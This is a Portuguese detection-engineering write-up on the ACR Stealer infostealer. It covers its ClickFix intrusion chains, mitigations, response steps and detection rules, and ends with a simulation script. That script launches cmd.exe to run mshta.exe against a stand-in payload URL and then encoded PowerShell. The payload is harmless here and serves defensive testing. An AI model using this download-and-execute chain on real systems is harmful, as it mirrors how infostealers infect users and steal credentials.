ACR Stealer: Duas Cadeias de Intrusão Observadas Durante Aumento na Atividade de Ameaças
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
ACR Stealer é uma família de malware de roubo de informações que usa iscas de engenharia social no estilo ClickFix para alvejar ambientes corporativos. O malware opera por meio de duas cadeias de infecção principais: uma que depende de cargas maliciosas entregues via WebDAV com carregadores Python e controle comando e controle baseado em blockchain, e outra que usa MSHTA com entrega de carga útil esteganográfica. Seu objetivo principal é roubar credenciais de navegador, tokens de autenticação e documentos sensíveis.
Investigação
Especialistas do Microsoft Defender observaram um aumento na atividade entre o final de abril e meados de junho de 2026. A investigação identificou dois caminhos de execução distintos: uma campanha baseada em disco envolvendo Python e tarefas agendadas, e uma campanha sem arquivo usando MSHTA e execução de shellcode na memória. Analistas também documentaram métodos avançados de evasão, incluindo timestomping, PowerShell ofuscado e resolutores de deixas mortos apoiados em blockchain.
Mitigação
As organizações devem treinar os usuários para reconhecer prompts do ClickFix e restringir a execução de scripts não confiáveis por meio de controle de aplicativos. Reduzir a exposição a malvertising e impor filtragem web pode ajudar a interromper tentativas de acesso inicial. Reforçar os endpoints limitando a dependência de credenciais armazenadas no navegador e aplicando autenticação multifator também é essencial para reduzir o risco de roubo de credenciais.
Resposta
Se essa atividade for detectada, dispositivos afetados devem ser isolados imediatamente e todas as credenciais e tokens potencialmente comprometidos devem ser rotacionados. Os tokens de sessão devem ser revogados, e os investigadores devem revisar conexões de saída para compartilhamentos remotos suspeitos ou serviços de hospedagem de imagem. O EDR em modo de bloqueio deve ser usado para conter a ameaça e remover artefatos maliciosos de forma eficiente.
Fluxo de Ataque
Detecções
Comportamento Suspeito de Evasão de Defesa LOLBAS MSHTA pela Detecção de Comandos Associados (via process_creation)
Visualizar
LOLBAS Conhost (via cmdline)
Visualizar
Tarefa Agendada via Objeto COM (via powershell)
Visualizar
Possível Descoberta de Informações do Sistema Usando o Módulo Powershell Wmi (via powershell)
Visualizar
Detecção de PowerShell Ofuscado e Tarefas Agendadas Mascaradas como Atualizações de Software [Windows Powershell]
Visualizar
Detecção de Execução ACR Stealer via Iscas ClickFix [Criação de Processo Windows]
Visualizar
Execução de Simulação
Pré-requisito: O Cheque de Pré-Voo de Telemetria e Linha de Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstractos ou não relacionados levarão a diagnósticos incorretos.
-
Narrativa do Ataque & Comandos: O adversário visa um usuário com um falso “erro do navegador” (ClickFix). Uma vez que o usuário copia e cola o comando em um terminal,
cmd.exeé invocado. O comando instruimshta.exea conectar-se a um URL remoto para buscar um script malicioso. Para evadir ainda mais a detecção simples de strings, o script usapowershell.execom um comando codificado (-Enc) para baixar e executar o malware ACR Stealer na memória, contornando a varredura tradicional baseada em arquivos. -
Script de Teste de Regressão:
# Simulação da Cadeia ACR Stealer ClickFix # Etapa 1: Simule o wrapper cmd.exe # Etapa 2: Invoque mshta.exe com um URL # Etapa 3: Seguido por um comando PowerShell codificado $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulating ACR Stealer Payload Execution'")) Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand" -
Comandos de Limpeza:
# Nenhum arquivo persistente é criado nesta simulação, mas certifique-se de que não fiquem processos órfãos Stop-Process -Name "mshta" -ErrorAction SilentlyContinue Stop-Process -Name "powershell" -ErrorAction SilentlyContinue